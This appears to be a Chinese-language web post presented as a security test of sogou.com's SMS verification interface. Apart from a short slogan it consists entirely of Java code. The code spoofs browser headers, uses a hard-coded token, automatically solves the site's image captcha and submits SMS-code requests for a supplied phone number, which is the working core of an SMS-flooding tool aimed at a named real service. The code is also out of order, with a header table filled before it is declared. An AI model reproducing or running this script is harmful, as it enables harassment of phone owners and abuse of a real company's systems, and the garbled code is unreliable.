安全測試 : 搜狗(sogou.com)網(wǎng)站短信接口安全測試,短信接口防盜刷測試
發(fā)布時間:2021-04-12 點擊數(shù):4356
安全問題不容忽視,不要亡羊補牢!
//配置請求頭
inheads.put("Host", "www.sogou.com");
inheads.put("Accept", "application/json, text/javascript, */*; q=0.01");
inheads.put("X-Requested-With", "XMLHttpRequest");
inheads.put("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
inheads.put("Referer", "https://www.sogou.com/register");
//配置請求參數(shù)
List<BasicNameValuePair> params = new ArrayList<BasicNameValuePair>();
params.add(new BasicNameValuePair("client_id", "2017"));
params.add(new BasicNameValuePair("mobile", phone));
params.add(new BasicNameValuePair("captcha", input.get("imgCode")));
params.add(new BasicNameValuePair("token", "3267574cf7a9289da2fce68b296c9d35"));
params.add(new BasicNameValuePair("t", "" + System.currentTimeMillis()));
//配置請求
Hashtable<String, String> inheads = new Hashtable<>();
LinkedHashMap<String, String> outheads = new LinkedHashMap<>();
Map<String, String> imgOutMap = new HashMap<>();
RetEntity retEntity = new RetEntity();
httpclient = createSSLClientDefault();
input.put("imgFmt", "png");
input.put("codeType", codetype);
input.put("lenMin", "1");
input.put("cleanType", "512");
String imgCode = getImgeCode(phone, httpclient, cookieStore, "get", imgUrl, inheads, outheads, input, imgOutMap);
input.put("imgCode", imgCode != null ? imgCode : "");
retEntity = userClick(httpclient, cookieStore, "post", smsUrl, inheads, outheads, input, phone);
closeHttpClient(httpclient);